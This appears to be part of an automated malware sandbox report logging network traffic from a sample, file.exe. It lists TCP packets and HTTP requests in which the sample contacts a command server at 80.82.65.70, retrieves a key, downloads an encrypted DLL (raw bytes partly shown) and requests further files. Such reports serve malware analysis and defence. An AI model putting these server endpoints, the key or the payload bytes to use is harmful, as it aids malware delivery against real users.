                                          Dec 13, 2024 06:13:00.133232117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.133285046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.134013891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.134077072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.134099960 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.134159088 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.134852886 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.134984970 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.135040998 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.135708094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.135790110 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.135842085 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.135905981 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.136614084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.136667013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.136725903 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.136873960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.137481928 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.137533903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.137603998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.137661934 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.138365030 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.138426065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.138461113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.138540030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.139200926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.139341116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.139344931 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.139448881 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.140089035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.140146017 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.140193939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.140325069 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.140968084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.141025066 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.141057014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.141108036 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.142024040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.142110109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.142132044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.142231941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.142699957 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.142755032 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.142755032 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.142807007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.189861059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.189938068 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.190002918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.190074921 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.190253019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.190376043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.190432072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.191113949 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.191220045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.191262007 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.191329956 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.192023039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.192080021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.192127943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.192179918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.192897081 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.192950010 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.193032980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.193082094 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.193762064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.193835974 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.193865061 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.193948030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.194618940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.194679976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.194749117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.195353031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.195522070 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.195585966 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.195705891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.195771933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.196377993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.196443081 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.196512938 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.196584940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.197212934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.197288036 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.197345018 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.197410107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.198092937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.198220968 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.198286057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.198286057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.198968887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.199026108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.199095964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.199172020 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.199857950 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.199915886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.199976921 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.200035095 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.200740099 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.200962067 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.226731062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.226795912 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.226850986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.226906061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.227108002 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.227273941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.227345943 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.227356911 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.227736950 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.228205919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.228240967 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.228261948 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.228291035 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.229037046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.229149103 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.229165077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.229217052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.229898930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.230000019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.230053902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.230834961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.230887890 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.230943918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.231621981 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.231731892 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.231736898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.232534885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.232582092 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.232582092 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.232625008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.232712030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.233374119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.233424902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.233485937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.233536959 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.234237909 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.234292030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.234319925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.234370947 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.270700932 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.270737886 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.270771980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.270804882 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.271058083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.271111965 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.271183014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.271250010 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.271930933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.271989107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.272044897 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.272178888 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.273089886 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.273269892 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.312982082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.313108921 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.313126087 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.313179970 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.313647032 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.313703060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.313704014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.313740015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.313765049 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.313792944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.314454079 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.314516068 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.314572096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.314631939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.315299988 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.315360069 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.315433025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.315522909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.316190958 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.316246033 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.316306114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.317117929 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.317173004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.317243099 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.317389011 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.317990065 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.318043947 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.318063021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.318192959 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.318768978 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.318836927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.318958998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.319600105 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.319710970 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.319844961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.319854975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.319906950 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.320538998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.320596933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.320611954 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.320818901 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.321427107 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.321489096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.321527958 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.321583986 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:00.322321892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:00.322382927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:03.354192019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:13:03.354265928 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:13:30.256292105 CET4978680192.168.2.580.82.65.70

                                          HTTP Request Dependency Graph

                                          • 80.82.65.70

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.54971680.82.65.70804308C:\Users\user\Desktop\file.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 13, 2024 06:12:22.608180046 CET412OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:23.975517035 CET204INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:23 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:24.157538891 CET386OUTGET /dll/key HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:24.634342909 CET224INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:24 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 21
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                          Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                          Dec 13, 2024 06:12:24.645905972 CET391OUTGET /dll/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: 1
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:25.202938080 CET1236INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:24 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                          Content-Length: 97296
                                          Keep-Alive: timeout=5, max=98
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                          Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                          Dec 13, 2024 06:12:25.203006983 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                          Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                          Dec 13, 2024 06:12:25.203043938 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                          Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                          Dec 13, 2024 06:12:25.203078032 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                          Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                          Dec 13, 2024 06:12:25.203114986 CET896INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                          Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                          Dec 13, 2024 06:12:25.203151941 CET1236INData Raw: e6 69 2d 49 51 f3 a4 d5 76 b0 82 cf 74 d1 85 19 f7 42 a9 78 eb 0b e9 01 32 e4 1d 91 61 e4 92 ad 68 8b f1 01 d1 83 62 ef 0e ea 87 d8 a0 66 e2 ec 6d df dc 97 39 57 94 e3 66 5a 2b 20 d1 43 cd 8a 07 04 20 9b 76 db 4c a6 9b 12 b9 0c 46 0b 2e ee 08 fc
                                          Data Ascii: i-IQvtBx2ahbfm9WfZ+ C vLF.CXb<SK(R?X.!:YjJD^J[,x)<"kp /uTW56"An*M%b"P{$T#/6UC{XQ;,>=
                                          Dec 13, 2024 06:12:25.203188896 CET1236INData Raw: df fc 63 59 94 94 22 2e 6e b1 dd f8 1b 24 0c 47 af 41 b3 94 25 ae 63 05 68 cb 3a 78 6c 3a e6 0d fb 89 7f 8a 63 45 33 22 3e 37 2f cf bc bf dc 07 94 6d 6c 26 9b 2d c4 5a 8b a4 95 2b 63 98 62 c1 cf a5 66 8f c2 9e 15 af 99 71 41 93 5a 45 26 fd cf ad
                                          Data Ascii: cY".n$GA%ch:xl:cE3">7/ml&-Z+cbfqAZE&j;{1:w\1`gub%gi&!3h+bn,awiHeKQZXrU)DT"->KTgx;1xY6#'BsZy
                                          Dec 13, 2024 06:12:25.203228951 CET1236INData Raw: ab 83 12 71 60 ef ac 34 32 d8 70 30 3b 55 9a 12 0e 9f 26 6c be 1f b1 56 29 68 86 1f 1c a5 97 2c 74 ca 37 9a 6a 55 f9 be e3 48 f7 00 72 6f 42 12 41 ec 23 16 2d cd d2 bf 20 52 76 63 2b 78 75 0d b1 13 ba b8 e6 b9 b1 8c 54 24 79 51 3b b2 29 1b ba 44
                                          Data Ascii: q`42p0;U&lV)h,t7jUHroBA#- Rvc+xuT$yQ;)D<1:XRE^7ipg/]BYZ*e'0ZiU4Nk+@V,E*#LQ$iT{}@zFA8F /7B@57ARN"lU^-
                                          Dec 13, 2024 06:12:25.203267097 CET1236INData Raw: 2b ed b6 90 93 b5 cb e9 5b 81 d3 0a ac cd 19 0a b7 db 61 4d 90 7d 85 3c 51 38 f9 08 b0 8a 2c 52 5c 3b a3 28 21 b4 b3 8b 95 1d cf 79 a5 e6 17 de 83 a8 dd 37 7c d0 40 73 1a 93 09 91 ed df 13 89 28 1d 8a d0 67 8b 19 59 81 4b 0b 18 94 db ad 26 01 9f
                                          Data Ascii: +[aM}<Q8,R\;(!y7|@s(gYK&&nB<H3Qh-`uK^TG{cKiF{R_y|w.y0Pc-:gZdSw^P;$)SL'3{y
                                          Dec 13, 2024 06:12:25.211251974 CET1236INData Raw: 54 e5 fd b2 c6 83 f0 18 cc 3c bb a5 89 7b 89 54 98 d8 15 a6 fa 49 a4 67 d0 03 82 eb c7 42 29 b9 76 f8 01 5c 2b 20 0a 5c 1d 33 83 13 83 42 79 3d 7e c9 17 b3 a3 51 aa c8 b6 32 7d 48 b8 ad f1 c2 7d 0a 69 9d c2 d2 7a 9b 73 02 47 89 ff 76 3e 73 48 a6
                                          Data Ascii: T<{TIgB)v\+ \3By=~Q2}H}izsGv>sH4w3*gWM|E j;zq{1"7:ZSe%%_d6YLVl]Rk&06B>lJk(:OB+8aQ$Mnwka{
                                          Dec 13, 2024 06:12:25.211422920 CET1236INData Raw: 5c d2 2a c3 33 ff 78 3e 6f b5 ff a6 6c 71 6d 25 ef c6 14 af 9c 6f 38 91 81 96 1f ad 1d af 35 bc c0 00 0c 9f 24 93 c9 3c e6 d2 fa 28 eb 2b 80 23 82 81 de 2e ac 96 52 f9 19 0f 6b e2 00 36 46 1d c0 9d 55 0b 0f 62 85 f0 77 cb de 0e 5b 62 17 62 91 0d
                                          Data Ascii: \*3x>olqm%o85$<(+#.Rk6FUbw[bbK[FV%#33<ilf.JiN<T=vroh'ekzw,`3MG]snz1;DBKG4h2)N%5^6x8dW61*~
                                          Dec 13, 2024 06:12:25.705229998 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:26.190165043 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:25 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=97
